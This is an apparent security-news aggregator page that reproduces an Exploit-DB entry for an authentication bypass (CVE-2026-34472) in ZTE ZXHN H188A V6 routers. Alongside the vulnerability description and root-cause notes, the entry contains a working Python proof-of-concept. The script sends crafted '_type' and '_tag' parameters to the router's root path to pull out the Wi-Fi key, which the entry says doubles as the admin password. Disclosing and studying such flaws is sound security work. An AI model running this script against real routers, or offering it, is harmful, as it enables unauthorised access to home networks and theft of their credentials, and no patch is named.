Security News

Cybersecurity news aggregator

🔓
HIGH Vulnerabilities Exploit-DB

[local] ZTE ZXHN H188A V6 - Authentication Bypass

An authentication bypass vulnerability (CVE-2026-34472, CVSS 7.1 HIGH) in ZTE ZXHN H188A routers allows unauthenticated attackers to retrieve WLAN PSKs, SSIDs, and PPPoE credentials by sending crafted requests with `_type` and `_tag` parameters to the root path, bypassing the QuickSetupEnable gate. The affected firmware versions are ZXHN H188A V6.0.10P2_TE and V6.0.10P3N3_TE. The article provides a proof-of-concept exploit but does not specify a patched version or available workaround.
Read Full Article →

This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING ZTE ZXHN H188A V6 - Authentication Bypass EDB-ID: 52593 CVE: 2026-34472 EDB Verified: Author: MINA NAGEH SALALMA Type: LOCAL Exploit: / Platform: MULTIPLE Date: 2026-05-29 Vulnerable App: # Exploit Title: ZTE ZXHN H188A V6 - Authentication Bypass # Date: 2026-05-20 # Exploit Author: Mina Nageh Salalma (Monx Research) # Vendor Homepage: https://www.zte.com.cn # Software Link: https://github.com/minanagehsalalma/cve-2026-34472-auth-bypass-zte-h188a-router # Version: ZXHN H188A V6.0.10P2_TE, V6.0.10P3N3_TE # Tested on: ZTE ZXHN H188A V6.0.10P2_TE # CVE: CVE-2026-34472 # Description: # Unauthenticated requests to the root path of ZTE ZXHN H188A V6 firmware # can reach pre-login wizard handlers and disclose WLAN PSKs, SSIDs, and # PPPoE usernames. The leaked Wi-Fi password is also the default administrator # password after uppercasing, resulting in full authentication bypass. # # Root cause: router_logic_impl.lua accepts _type and _tag directly for # empty-path requests. urlpath_2type_modifier.lua only applies QuickSetupEnable # when _type is missing. Wizard handlers then expose credential-bearing read # actions (getPassword, wlan_get, ppp_get) for unauthenticated users. # # Approximately 500 publicly exposed H188A interfaces were reachable at # time of original report (May 2024). ZTE PSIRT stopped responding; CVE # assigned by MITRE on 2026-03-27 after escalation. # # MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-34472 # PoC - Trigger wizard credential endpoint (Python 3 / requests) import requests import sys def exploit(target): url = f"http://{target}/" # Craft request with _type parameter to bypass QuickSetupEnable gate params = {"_type": "loginData", "_tag": "login_entry"} headers = {"Content-Type": "application/x-www-form-urlencoded"} data = {"IF_ACTION": "getPassword", "_InstID_PASS": "DEV.WIFI.AP1.PSK1", "PASSTYPE": "PSK"} try: r = requests.post(url, params=params, headers=headers, data=data, timeout=10, verify=False) print(f"[+] {target} HTTP {r.status_code}") print(r.text[:2000]) except Exception as e: print(f"[-] {target}: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: poc.py <target_ip>") sys.exit(1) exploit(sys.argv[1]) Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.

Share this article